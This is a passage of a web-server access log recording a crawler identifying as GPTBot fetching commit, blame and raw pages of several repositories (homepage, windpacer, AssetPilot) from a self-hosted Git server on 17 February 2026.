"/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" +[17/Feb/2026:14:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11239] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" +[17/Feb/2026:14:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" +[17/Feb/2026:14:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498866] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692380] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641824] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699424] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508490] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429968] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" +[17/Feb/2026:14:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" +[17/Feb/2026:14:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" +[17/Feb/2026:14:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts?display=source" [Client 74.7.227.38] [Length 11501] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" +[17/Feb/2026:14:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts?display=source" [Client 74.7.227.38] [Length 11503] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" +[17/Feb/2026:14:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts?display=source" [Client 74.7.227.38] [Length 11500] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" +[17/Feb/2026:14:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" +[17/Feb/2026:14:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" +[17/Feb/2026:14:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10696] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:14:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18933] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10035] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10066] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18901] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18931] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" +[17/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" +[17/Feb/2026:14:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" +[17/Feb/2026:14:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 22437] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10194] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" +[17/Feb/2026:14:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 10183] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 10351] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9960] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10174] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" +[17/Feb/2026:14:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" +[17/Feb/2026:14:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx" [Client 74.7.227.38] [Length 35607] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" +[17/Feb/2026:14:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 285525] [Gzip 13.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:14:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fnginx" [Client 74.7.227.38] [Length 23995] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" +[17/Feb/2026:14:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 57612] [Gzip 10.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:14:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23719] [Gzip 11.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" +[17/Feb/2026:14:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23753] [Gzip 